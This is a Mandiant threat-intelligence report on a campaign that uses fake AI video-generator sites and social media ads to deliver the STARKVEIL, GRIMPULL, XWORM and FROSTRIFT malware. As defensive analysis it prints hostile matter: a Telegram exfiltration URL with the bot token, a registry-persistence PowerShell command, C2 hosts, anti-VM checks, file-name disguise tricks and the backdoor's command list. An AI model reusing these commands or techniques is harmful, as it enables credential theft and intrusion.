{
	"id": "2e20fbcc-dba4-40de-9461-027a191e67fe",
	"created_at": "2026-04-06T00:17:28.763205Z",
	"updated_at": "2026-04-10T03:37:08.763484Z",
	"deleted_at": null,
	"sha1_hash": "7f70590d2c14a86dbe7cc3a31817710972e8179b",
	"title": "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5697373,
	"plain_text": "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed\r\nWebsites\r\nBy Mandiant\r\nPublished: 2025-05-27 · Archived: 2026-04-05 12:38:13 UTC\r\nWritten by: Diana Ion, Rommel Joven, Yash Gupta\r\nSince November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest\r\naround AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes\r\nfake “AI video generator” websites to distribute malware leading to the deployment of payloads such as Python-based\r\ninfostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that\r\nmasquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant\r\nThreat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across\r\nvarious social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as\r\nwell, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances\r\nof success. \r\nMandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies,\r\ncredit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG)\r\nassesses UNC6032 to have a Vietnam nexus. \r\nMandiant Threat Defense acknowledges Meta's collaborative and proactive threat hunting efforts in removing the identified\r\nmalicious ads, domains, and accounts. 
Notably, a significant portion of Meta’s detection and removal began in 2024, prior to\r\nMandiant alerting them of additional malicious activity we identified.\r\nA similar investigation was recently published by Morphisec.\r\nCampaign Overview\r\nThreat actors haven't wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI's popularity\r\nsurged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have\r\nfueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools.\r\nThese websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure\r\n1 and Figure 2.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 1 of 28\n\nFigure 1: Malicious Facebook ads\r\nFigure 2: Malicious LinkedIn ads\r\nAs part of Meta’s implementation of the Digital Services Act, the Ad Library displays additional information (ad campaign\r\ndates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also\r\nimplemented a similar transparency tool.\r\nOur research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active\r\nsince mid-2024, all displaying similar ad content. The majority of the ads we found ran on Facebook, with only a handful\r\nalso advertised on LinkedIn. The ads were published both from attacker-created Facebook pages and from\r\ncompromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious\r\nads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1\r\ndisplays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. 
According\r\nto Meta, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once.\r\nAd Library ID Ad Start Date Ad End Date EU Reach\r\n1589369811674269 14.12.2024 18.12.2024 300,943\r\n559230916910380 04.12.2024 09.12.2024 298,323\r\n926639029419602 07.12.2024 09.12.2024 270,669\r\n1097376935221216 11.12.2024 12.12.2024 124,103\r\n578238414853201 07.12.2024 10.12.2024 111,416\r\nTable 1: Top 5 Facebook ads by reach\r\nThe threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans.\r\nWe noted that once a domain is registered, it is referenced in ads within a few days, if not the same day. Moreover, most\r\nof the ads are short-lived, with new ones being created on a daily basis.\r\nOn LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps://klingxai[.]com. This domain was\r\nregistered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of\r\n50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting\r\nincluded other regions such as Europe and Australia.\r\nAd Library ID Ad Start Date Ad End Date Total Impressions % Impressions in the US\r\n490401954 20.09.2024 20.09.2024 \u003c1k 22\r\n508076723 27.09.2024 28.09.2024 10k-50k 68\r\n511603353 30.09.2024 01.10.2024 10k-50k 61\r\n511613043 30.09.2024 01.10.2024 10k-50k 40\r\n511613633 30.09.2024 01.10.2024 10k-50k 54\r\n511622353 30.09.2024 01.10.2024 10k-50k 36\r\nTable 2: LinkedIn ads\r\nFrom the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported\r\nfunctionalities such as text-to-video or image-to-video generation. 
Once the user provides a prompt to generate a video,\r\nregardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure.\r\nThe payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily\r\ndesigned for information theft and capable of downloading plugins to extend their functionality. The presence of multiple,\r\nsimilar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked\r\nby security defences.\r\nIn the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to.\r\nLuma AI Investigation\r\nInfection Chain\r\nFigure 3: Infection chain lifecycle\r\nThis blog post provides a detailed analysis of our findings on the key components of this campaign:\r\nLure: The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites,\r\nresulting in malware downloads.\r\nMalware: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM\r\nand FROSTRIFT backdoors and the GRIMPULL downloader.\r\nExecution: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to\r\nexecute its payloads.\r\nPersistence: It uses an AutoRun registry key for its two backdoors (XWORM and FROSTRIFT).\r\nAnti-VM and Anti-analysis: GRIMPULL checks for commonly used artifacts and features of known sandbox and\r\nanalysis tools.\r\nReconnaissance\r\nHost reconnaissance: XWORM and FROSTRIFT survey the host by collecting information, including OS,\r\nusername, role, hardware identifiers, and installed AV.\r\nSoftware reconnaissance: FROSTRIFT checks the existence of certain messaging applications and browsers.\r\nCommand-and-control (C2)\r\nTor: GRIMPULL utilizes a 
Tor tunnel to fetch additional .NET payloads.\r\nTelegram: XWORM sends a victim notification via Telegram, including information gathered during host\r\nreconnaissance.\r\nTCP: The malware connects to its C2 using ports 7789, 25699, and 56001.\r\nInformation stealer\r\nKeylogger: XWORM logs keystrokes from the host.\r\nBrowser extensions: FROSTRIFT scans for 48 browser extensions related to password managers,\r\nauthenticators, and digital wallets, potentially for data theft.\r\nBackdoor Commands: XWORM supports multiple commands for further compromise.\r\nThe Lure\r\nThis particular case began with a Facebook ad for “Luma Dream AI Machine”, masquerading as a well-known text-to-video AI tool, Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at\r\nhxxps://lumalabsai[.]in/.\r\nFigure 4: The ad the victim clicked on\r\nOnce on the fake Luma AI website, the user can click the “Start Free Now” button and choose from various video generation\r\nfunctionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5.\r\nThis multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website,\r\ncreates a sense of familiarity for the user and does not give any immediate indication of malicious intent. Once the user hits\r\nthe generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is\r\nsupposedly ready, a Download button is displayed. 
This leads to the download of a ZIP archive file on the victim host.\r\nFigure 5: Fake AI video generation website\r\nUnsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no\r\nconnection to the user input. In this case, several archives were hosted at the path hxxps://lumalabsai[.]in/complete/.\r\nMandiant determined that the website will serve the archive file with the most recent “Last Modified” value, indicating\r\ncontinuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally\r\nsimilar, with different obfuscation techniques applied, thus resulting in different sizes.\r\nFigure 6: Payloads hosted at hxxps://lumalabsai[.]in/complete\r\nExecution\r\nThe previously downloaded ZIP archive contains an executable with a double extension (.mp4 and .exe) in its name,\r\nseparated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80) characters. This is a special\r\nwhitespace character from the Braille Patterns block in Unicode.\r\nFigure 7: Braille Pattern Blank characters in the file name\r\nThe resulting file name, Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, aims to make the binary less\r\nsuspicious by pushing the .exe extension out of the user's view. The number of Braille Pattern Blank characters used varies\r\nacross different samples served, ranging from 13 to more than 30. 
To further hide the true purpose of this binary, the default\r\n.mp4 Windows icon is used on the malicious file.\r\nFigure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file.\r\nFigure 8: Malicious binary vs legitimate .mp4 file\r\nSTARKVEIL\r\nThe binary Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, tracked by Mandiant as STARKVEIL, is a\r\ndropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware\r\ncomponents. These are later utilized to inject malicious code into several legitimate processes.\r\nExecuting the malware displays an error window, as seen in Figure 9, to trick the user into believing that the file is corrupted\r\nand into trying to execute it again.\r\nFigure 9: Error window displayed when executing STARKVEIL\r\nFor a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the\r\nembedded files under the C:\\winsystem\\ directory.\r\nFigure 10: Files in the winsystem directory\r\nDuring the second execution, the main executable spawns the Python Launcher, py.exe, with an obfuscated Python\r\ncommand as an argument. The Python command decodes embedded Python code, which Mandiant tracks as\r\nthe COILHATCH dropper. 
COILHATCH performs the following actions (note that the script has been deobfuscated and\r\nrenamed for improved readability):\r\nThe command takes a Base85-encoded string, decodes it, decompresses the result using zlib, deserializes the\r\nresulting data using the marshal module, and then executes the final deserialized data as Python code.\r\nFigure 11: Python command\r\nThe decompiled first-stage Python code combines RSA, AES, RC4, and XOR techniques to decrypt the second-stage\r\nPython bytecode.\r\nFigure 12: First-stage Python\r\nThe decrypted second-stage Python script executes C:\\winsystem\\heif\\heif.exe, which is a legitimate, digitally\r\nsigned executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware\r\ncomponents.\r\nFigure 13: Second-stage Python\r\nThe following is the resulting process tree:\r\nexplorer.exe\r\n ↳ 7zfm.exe \"\u003cpath\u003e\\Lumalabs_1926326251082123689-626.zip\"\r\n   ↳ \"\u003cpath\u003e\\lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe\"\r\n     ↳ \"C:\\winsystem\\py\\py.exe\" -c exec(__import__ ..\u003cENCODED PYTHON CODE\u003e..)\r\n       ↳ \"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\winsystem\\heif\\heif.exe\"\r\n         ↳ \"C:\\winsystem\\heif\\heif.exe\"\r\nMalware Analysis\r\nAs mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its\r\nsecond execution. 
The complete analysis of all the malware components and their roles is provided in the next sections.\r\nDirectory Benign File Side-Loaded DLL Role (Malware)\r\nC:\\winsystem\\heif heif.exe heif.dll (SHA256: 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b) Launcher\r\n%APPDATA%\\Launcher Launcher.exe libde265.dll (SHA256: 4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959) Persistence\r\n%APPDATA%\\python python.exe avcodec-61.dll (SHA256: 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc) Downloader (GRIMPULL)\r\n%APPDATA%\\pythonw pythonw.exe heif.dll (SHA256: a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3) Backdoor executed at runtime (XWORM)\r\nC:\\winsystem\\heif-info heif-info.exe heif.dll (SHA256: 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb) Backdoor persistence (XWORM)\r\n%APPDATA%\\ffplay ffplay.exe libde265.dll (SHA256: dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3) Backdoor executed at runtime (FROSTRIFT)\r\nC:\\winsystem\\heif2rgb heif2rgb.exe heif.dll (SHA256: e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822) Backdoor persistence (FROSTRIFT)\r\nTable 3: Malware components\r\nEach of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through\r\nprocess replacement.\r\nLauncher\r\nThe execution of C:\\winsystem\\heif\\heif.exe results in the side-loading of the malicious heif.dll, located in the same\r\ndirectory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs\r\ncode injection through process replacement.\r\nThe injected code is a .NET executable that acts as a launcher and performs the following:\r\n1. 
Moves multiple folders from C:\\winsystem to %APPDATA%. The destination folders are:\r\n%APPDATA%\\python\r\n%APPDATA%\\pythonw\r\n%APPDATA%\\ffplay\r\n%APPDATA%\\Launcher\r\n2. Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process\r\nare:\r\npython.exe: %APPDATA%\\python\\avcodec-61.dll\r\npythonw.exe: %APPDATA%\\pythonw\\heif.dll\r\nffplay.exe: %APPDATA%\\ffplay\\libde265.dll\r\n3. Establishes persistence via an AutoRun registry key.\r\nvalue: Dropbox\r\nkey: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nroot: HKCU\\\r\nvalue data: \"cmd.exe /c \\\"cd /d \"\u003cexePath\u003e\" \u0026\u0026 \"Launcher.exe\"\"\r\nFigure 14: Main function of launcher\r\nThe AutoRun key executes %APPDATA%\\Launcher\\Launcher.exe, which side-loads the DLL file libde265.dll. This DLL\r\nspawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code’s main purpose is to execute\r\nthe legitimate binaries C:\\winsystem\\heif2rgb\\heif2rgb.exe and C:\\winsystem\\heif-info\\heif-info.exe, which, in\r\nturn, side-load the backdoors XWORM and FROSTRIFT, respectively.\r\nGRIMPULL\r\nOf the three executables, the launcher first executes %APPDATA%\\python\\python.exe, which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process.\r\nGRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server\r\nconnections.\r\nAnti-VM and Anti-Analysis\r\nGRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3, and terminates itself if this is\r\nfound. 
Otherwise, the malware proceeds to perform further anti-VM checks, exiting if any of the following checks\r\nsucceeds.\r\nAnti-VM and Anti-Analysis Checks\r\nModule Detection: Checks for sandbox/analysis tool DLLs:\r\nSbieDll.dll (Sandboxie)\r\ncuckoomon.dll (Cuckoo Sandbox)\r\nBIOS Information Checks: Queries Win32_BIOS via WMI and checks version and serial number for:\r\nVMware\r\nVIRTUAL\r\nA M I (AMI BIOS)\r\nXen\r\nParent Process Check: Checks if the parent process is cmd (command line)\r\nVM File Detection: Checks for the existence of vmGuestLib.dll in the System folder\r\nSystem Manufacturer Checks: Queries Win32_ComputerSystem via WMI and checks manufacturer and\r\nmodel for:\r\nMicrosoft (Hyper-V)\r\nVMWare\r\nVirtual\r\nDisplay and System Configuration Checks: Checks for specific screen resolutions:\r\n1440x900\r\n1024x768\r\n1280x1024\r\nChecks if the OS is 32-bit\r\nUsername Checks: Checks for common analysis environment usernames:\r\njohn\r\nanna\r\nAny username containing xxxxxxxx\r\nTable 4: Anti-VM and Anti-analysis checks\r\nDownload Function\r\nGRIMPULL verifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress,\r\nand execute Tor from the following URL:\r\nhttps://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-13.0.9.tar.gz\r\nFigure 15: Download function\r\nAfterwards, Tor will run locally on port 9050.\r\nC2 Communication\r\nGRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP:\r\nstrokes[.]zapto[.]org:7789\r\nThe malware maintains this connection and periodically checks for .NET payloads. 
Fetched payloads are decrypted using\r\nTripleDES in ECB mode with the MD5 hash of the campaign ID aff391c406ebc4c3 as the decryption key, decompressed\r\nwith GZip (using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies.\r\nMalware Configuration\r\nThe configuration elements are encoded as base64 strings, as shown in Figure 16.\r\nFigure 16: Encoded malware configuration\r\nTable 5 shows the extracted malware configuration.\r\nGRIMPULL Malware Configuration\r\nC2 domain/server strokes[.]zapto[.]org\r\nPort number 7789\r\nUnique identifier/campaign ID aff391c406ebc4c3\r\nConfiguration profile name Default\r\nTable 5: GRIMPULL configuration\r\nXWORM\r\nSecond, the launcher executes the file %APPDATA%\\pythonw\\pythonw.exe, which side-loads the DLL heif.dll and\r\ninjects XWORM into a legitimate Windows process.\r\nXWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality\r\ninvolves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and\r\nexecuted. 
Supported capabilities include keylogging, command execution, screen capture, and spreading to USB drives.\r\nXWORM Configuration\r\nThe malware begins by decoding its configuration using the AES algorithm.\r\nFigure 17: Decryption of configuration\r\nTable 6 shows the extracted malware configuration.\r\nXWORM Malware Configuration\r\nHost artisanaqua[.]ddnsking[.]com\r\nPort number 25699\r\nKEY \u003c123456789\u003e\r\nSPL \u003cXwormmm\u003e\r\nVersion XWorm V5.2\r\nUSBNM USB.exe\r\nTelegram Token 8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0\r\nTelegram ChatID -1002475751919\r\nMutex ZMChdfiKw2dqF51X\r\nTable 6: XWORM configuration\r\nHost Reconnaissance\r\nThe malware then performs a system survey to gather the following information:\r\nBot ID\r\nUsername\r\nOS Name\r\nIf it’s running on USB\r\nCPU Name\r\nGPU Name\r\nRAM Capacity\r\nAV Products list\r\nSample of collected information:\r\n☠ [KW-2201]\r\nNew Clinet : \u003cclient_id_from_machine_info_hash\u003e\r\nUserName : \u003cvictim_username\u003e\r\nOSFullName : \u003cvictim_OS_name\u003e\r\nUSB : \u003cis_sample_name_USB.exe\u003e\r\nCPU : \u003ccpu_description\u003e\r\nGPU : \u003cgpu_description\u003e\r\nRAM : \u003cram_size_in_GBs\u003e\r\nGroub : \u003cinstalled_av_solutions\u003e\r\nThis information is sent to a Telegram chat:\r\nhxxps[:]//api[.]telegram[.]org:443/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0/sendMessage?chat_id=-1002475751919\u0026text=\u003ccollected_sysinfo\u003e\r\nKeylogging\r\nThe malware sample saves the logged keystrokes to the file %temp%\\Log.tmp.\r\nSample of the content of Log.tmp:\r\n....### explorer ###..[Back]\r\n[Back]\r\nb\r\na\r\nn\r\nk\r\n[ENTER]\r\nC2 Communication\r\nThe sample connects to its C2 server at 
tcp://artisanaqua[.]ddnsking[.]com:25699 and initially sends the following\r\ninformation to the C2:\r\n\"INFO\u003cXwormmm\u003evictim_id\u003cXwormmm\u003euser\u003cXwormmm\u003e\r\nos_name\u003cXwormmm\u003eXWorm V5.2\u003cXwormmm\u003edate_in_dd/mm/yyyy\r\n\u003cXwormmm\u003eis_sample_name_USB.exe\r\n\u003cXwormmm\u003eis_administrator\u003cXwormmm\u003ehas_webcam\u003cXwormmm\u003ecpu_info\r\n\u003cXwormmm\u003egpu_info\u003cXwormmm\u003eram_size\u003cXwormmm\u003einstalled_AVs\"\r\nThen the sample waits for any of the following supported commands:\r\nCommand Description\r\npong: echo back to server\r\nrec: restart bot\r\nCLOSE: shutdown bot\r\nuninstall: self delete\r\nupdate: uninstall and execute received new version\r\nDW: Execute file on disk via powershell\r\nFM: Execute .NET file in memory\r\nLN: Download file from supplied URL and execute on disk\r\nUrlopen: Perform network request via browser\r\nUrlhide: Perform network request in process\r\nPCShutdown: Shutdown PC now\r\nPCRestart: Restart PC now\r\nPCLogoff: Log off\r\nRunShell: Execute CMD on shell\r\nStartDDos: Spam HTTP requests over TCP to target\r\nStopDDos: Kill DDOS threads\r\nStartReport: List running processes continuously\r\nStopReport: Kill process monitoring threads\r\nXchat: Send C2 message\r\nHosts: Get hosts file contents\r\nShosts: Write to file, likely to overwrite hosts file contents\r\nDDos: Unimplemented\r\nngrok: Unimplemented\r\nplugin: Load a Bot plugin\r\nsavePlugin: Save plugin to registry and load it (HKCU\\Software\\\u003cvictim_id\u003e\\\u003cplugin_name\u003e=\u003cplugin_bytes\u003e)\r\nRemovePlugins: Delete all plugins in registry\r\nOfflineGet: Read Keylog\r\n$Cap: Get screen capture\r\nTable 7: Supported commands\r\nFROSTRIFT\r\nLastly, the launcher executes the file %APPDATA%\\ffplay\\ffplay.exe to side-load the 
DLL\r\n%APPDATA%\\ffplay\\libde265.dll and inject FROSTRIFT into a legitimate Windows process.\r\nFROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of\r\nreceiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates\r\nwith the C2 server using GZIP-compressed protobuf messages over TCP/SSL.\r\nMalware Configuration\r\nThe malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message\r\nembedded within the strings table.\r\nFigure 18: FROSTRIFT configuration\r\nTable 8 shows the extracted malware configuration.\r\nField Value\r\nProtobuf Tag 38\r\nC2 Domain strokes.zapto[.]org\r\nC2 Port 56001\r\nSSL Certificate \u003cBase64 encoded SSL certificate\u003e\r\nUnknown Default\r\nInstallation folder APPDATA\r\nMutex 7d9196467986\r\nTable 8: FROSTRIFT configuration\r\nPersistence\r\nFROSTRIFT can achieve persistence by running the command:\r\npowershell.exe \"Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '\u003csample_file_name\u003e';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '\u003csample_file_name\u003e' -Value '\"\"%APPDATA%\\\u003csample_file_name\u003e\"\"' -PropertyType 'String'\"\r\nThe sample copies itself to %APPDATA% and adds a new registry value under\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the new file path as data to ensure persistence at each system\r\nstartup.\r\nHost Reconnaissance\r\nThe following information is initially collected and submitted by the malware to the C2:\r\nCollected Information\r\nHost 
information: Installed Anti-Virus, Web camera, Hostname, Username and Role, OS name, Local time\r\nVictim ID: HEX digest of the MD5 hash of the following, combined: Sample process ID, Disk drive serial number, Physical memory serial number, Victim user name\r\nMalware Version: 4.1.8\r\nSoftware Applications: com.liberty.jaxx, Foxmail, Telegram, Browsers (see Table 10)\r\nStandalone Crypto Wallets: Atomic, Bitcoin-Qt, Dash-Qt, Electrum, Ethereum, Exodus, Litecoin-Qt, Zcash, Ledger Live\r\nBrowser Extensions: Password managers, Authenticators, and Digital wallets (see Table 11)\r\nOthers: 5th entry from the Config (“Default” in this sample); Malware full file path\r\nTable 9: Collected information\r\nFROSTRIFT checks for the existence of the following browsers:\r\nChromium, Chrome, Brave, Edge, QQBrowser, ChromePlus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa,\r\nElements Browser, Epic Privacy Browser, uCozMedia Uran, Sleipnir5, Citrio, Coowon, liebao, QIP Surf, Orbitum, Dragon,\r\nAmigo, Torch, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Atom\r\nTable 10: List of browsers\r\nFROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and\r\nDigital wallets. 
The full list is provided in Table 11.\r\nString Extension\r\nibnejdfjmmkpcnlpebklmnkoeoihofec TronLink\r\nnkbihfbeogaeaoehlefnkodbefgpgknn MetaMask\r\nfhbohimaelbohpjbbldcngcnapndodjp Binance Chain Wallet\r\nffnbelfdoeiohenkjibnmadjiehjhajb Yoroi\r\ncjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty\r\nfihkakfobkmkjojpchpfgcmhfjnmnfpi BitApp Wallet\r\nkncchdigobghenbbaddojjnnaogfppfj iWallet\r\naiifbnbfobpmeekipheeijimdpnlpgpp Terra Station\r\nijmpgkjfkbfhoebgogflfebnmejmfbml BitClip\r\nblnieiiffboillknjnepogjhkgnoapac EQUAL Wallet\r\namkmjjmmflddogmhpjloimipbofnfjih Wombat\r\njbdaocneiiinmjbjlgalhcelgbejmnid Nifty Wallet\r\nafbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet\r\nhpglfhgfnhbgpjdenjgmdgoeiappafln Guarda\r\naeachknmefphepccionboohckonoeemg Coin98 Wallet\r\nimloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager\r\noeljdldpnmdbchonielidgobddffflal EOS Authenticator\r\ngaedmjdfmmahhbjefcbgaolhhanlaolb Authy\r\nilgcnhelpchnceeipipijaljkblbcobl GAuth Authenticator\r\nbhghoamapcdpbohphigoooaddinpkbai Authenticator\r\nmnfifefkajgofkcjkemidiaecocnkjeh TezBox\r\ndkdedlpgdmmkkfjabffeganieamfklkm Cyano Wallet\r\naholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3\r\njiidiaalihmmhddjgbnbgdfflelocpak BitKeep\r\nhnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet\r\negjidjbpglichdcondbcbdnbeeppgdph Trust Wallet\r\nhmeobnfnfcmdkdcmlblgagmfpfboieaf XDEFI Wallet\r\nbfnaelmomeimhlpmgjnjophhpkkoljpa Phantom\r\nfcckkdbjnoikooededlapcalpionmalo MOBOX WALLET\r\nbocpokimicclpaiekenaeelehdjllofo XDCPay\r\nflpiciilemghbmfalicajoolhkkenfel ICONex\r\nhfljlochmlccoobkbcgpmkpjagogcgpk Solana Wallet\r\ncmndjbecilbocjfkibfbifhngkdmjgog Swash\r\ncjmkndjhnagcfbpiemnkdpomccnjblmj Finnie\r\nknogkgcdfhhbddcghachkejeap Keplr\r\nkpfopkelmapcoipemfendmdcghnegimn Liquality 
Wallet\r\nhgmoaheomcjnaheggkfafnjilfcefbmo Rabet\r\nfnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet\r\nklnaejjgbibmhlephnhpmaofohgkpgkd ZilPay\r\nejbalbakoplchlghecdalmeeeajnimhm MetaMask\r\nghocjofkdpicneaokfekohclmkfmepbp Exodus Web3\r\nheaomjafhiehddpnmncmhhpjaloainkn Trust Wallet\r\nhkkpjehhcnhgefhbdcgfkeegglpjchdc Braavos Smart Wallet\r\nakoiaibnepcedcplijmiamnaigbepmcb Yoroi\r\ndjclckkglechooblngghdinmeemkbgci MetaMask\r\nacdamagkdfmpkclpoglgnbddngblgibo Guarda Wallet\r\nokejhknhopdbemmfefjglkdfdhpfmflg BitKeep\r\nmijjdbgpgbflkaooedaemnlciddmamai Waves Keeper\r\nTable 11: List of browser extensions\r\nC2 Communication\r\nThe malware expects the C2 to respond by sending GZIP-compressed Protobuf messages with the following fields:\r\nregistry_val: A registry value under HKCU\\Software\\\u003cvictim_id\u003e to store the loader_bytes.\r\nloader_bytes: Assembly module to load the loaded_bytes (stored in the registry in reverse order).\r\nloaded_bytes: GZIP-compressed assembly module to be loaded in-memory.\r\nThe sample receives loader_bytes only in the first message, as it stores it under the registry value HKCU\\Software\\\u003cvictim_id\u003e\\registry_val. 
For the subsequent messages, it only receives registry_val, which it uses to fetch\r\nloader_bytes from the registry.\r\nThe sample sends empty GZIP-compressed Protobuf messages as a keep-alive mechanism until the C2 sends another\r\nassembly module to be loaded.\r\nThe malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not\r\nenabled in this sample):\r\nWebDriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll\r\nchromedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe\r\nmsedgedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe\r\nThe files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can\r\nalso be used by attackers for malicious purposes, such as deploying additional payloads.\r\nConclusion\r\nAs AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have\r\ntaken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake “AI websites”\r\npose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers;\r\nanyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a\r\nvictim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website's\r\ndomain.\r\nAcknowledgements\r\nSpecial thanks to Stephen Eckels, Muhammad Umair, and Mustafa Nasser for their assistance in analyzing the malware\r\nsamples. Richmond Liclican for his inputs and attribution. 
